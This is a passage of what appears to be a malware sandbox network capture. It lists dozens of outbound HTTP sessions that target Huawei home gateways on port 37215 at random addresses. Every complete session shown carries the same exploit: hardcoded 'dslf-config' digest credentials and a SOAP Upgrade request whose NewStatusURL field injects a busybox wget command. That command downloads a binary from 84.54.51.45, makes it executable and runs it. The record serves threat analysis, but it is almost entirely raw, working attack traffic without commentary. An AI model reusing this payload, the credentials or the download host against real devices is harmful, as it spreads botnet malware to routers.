                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1297192.168.2.1558208197.110.129.15537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730387926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1298192.168.2.1546290197.184.38.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730401993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1299192.168.2.1540210197.106.34.14637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730407953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1300192.168.2.1552620197.44.74.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730441093 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1301192.168.2.1556894197.24.63.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730441093 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1302192.168.2.1537310197.24.142.8537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730454922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1303192.168.2.1558104197.121.157.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730483055 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1304192.168.2.1544138197.229.250.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730510950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1305192.168.2.1560246197.198.194.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730515003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1306192.168.2.1560794197.165.66.12537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730524063 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
